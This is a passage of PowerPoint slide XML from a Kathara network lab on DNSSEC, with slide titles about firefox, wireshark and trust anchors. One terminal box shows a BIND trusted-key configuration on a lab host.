          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Segnaposto contenuto 6" descr="Immagine che contiene testo, schermata, software, Icona del computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA6F0D92-AD8F-BDB3-0278-1C41A27480A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36914" y="1082911"/>
            <a:ext cx="9571511" cy="5436658"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44163916-990F-E75B-5DE2-0570C93EDF4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDE8AA6E-512B-CE77-09BD-757B42CF864D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A3DF717-3AC0-538C-E9D5-B422C8DCB44F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5838858" y="1868398"/>
            <a:ext cx="2782277" cy="1421068"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -104244"/>
              <a:gd name="adj2" fmla="val -63765"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>type "www.uniroma3.it" as the URL in the search bar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128283510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ECB8D4-1FDB-7F29-3DF8-05E23A3D7CD4}"/>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BA551C69-B986-D21F-6CD5-08261D3F5105}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA900A29-4A67-7797-F0CC-AD2AD37C7781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFCD2197-EDD8-5457-5EA5-A549E6420A01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Segnaposto contenuto 8" descr="Immagine che contiene testo, schermata, software, Pagina Web&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corretto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6C22FC3-E9F7-277D-71D7-0788E6BB1B0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07127" y="1078483"/>
            <a:ext cx="8977746" cy="5374708"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23143A59-8926-58BF-7CAD-8719B3BADD83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8917303" y="1259632"/>
            <a:ext cx="2782277" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -114061"/>
              <a:gd name="adj2" fmla="val 121730"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> worked, returning server failure</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148727203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029CA0-0A09-A6F8-2E6B-F3ADB1821BFA}"/>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63358353-DF27-0C8D-90A2-9C44FAF2F204}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>wireshark</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9DF6EFB-0445-925A-30AE-57750F7E2C79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>last update: Nov 2025</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F644EA51-4218-765D-985B-0417D77BD24D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:t>kathara – [ lab: basic-ipv4 ]</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Segnaposto contenuto 6" descr="Immagine che contiene testo, schermata, software, Pagina Web&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corretto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F54C2782-7997-EF12-820D-56C9A225F3E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67338" y="1105070"/>
            <a:ext cx="10657324" cy="5348121"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24996636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7608B6-043B-5582-FC9F-2B8C4BB09935}"/>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05AD22EB-1C4B-3ACF-7317-14E2F138796A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>wireshark</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B842205D-1301-F8C6-CC37-78CDF3773834}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>last update: Nov 2025</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9EFD20E-EB70-F82E-8708-1F5AC5CF3B5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:t>kathara – [ lab: basic-ipv4 ]</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Segnaposto contenuto 7" descr="Immagine che contiene testo, schermata, software, Pagina Web&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corretto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BE6A173-06A4-E124-45B8-CB1886138B2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44554" y="1107981"/>
            <a:ext cx="10479508" cy="5250682"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281008541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893FCF-DFCB-4312-C7E7-A4AE716607E2}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16386" name="Titolo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40EEDF0F-6EDA-7B05-635E-34FF320094F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>trust-anchors view</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA23B9F7-8494-9F96-153F-9FD21C90C151}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>pc4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>let's see the trust-anchors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687919AB-5CE6-CE9B-BB14-F1E8ED662C70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFAC2774-BE74-68D4-604B-553C85296223}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{625C6A2A-FB96-EF84-99A4-EA827DCE1E4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="609600" y="2748056"/>
            <a:ext cx="10972799" cy="2697167"/>
            <a:chOff x="4014773" y="2378845"/>
            <a:chExt cx="7565509" cy="2825300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F50E487-3D30-7C05-9839-C14C4248F996}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4014776" y="2632080"/>
              <a:ext cx="7565506" cy="2572065"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="40000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="t"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc4</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cat /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/trusted-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>key.conf</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>trust-anchors { "." static-key 257 3 13 "wu8ma9EvxFhISJabP7+JOBwn/geejdepyV4WVi5Uv0Tn80KNQfpAuDeNhKEunT5pmUXjIx/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rkdOiK</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>xApdQNEg</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=="; };</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56746262-566D-912A-319A-F999835CB647}"/>
                </a:ext>
              </a:extLst>
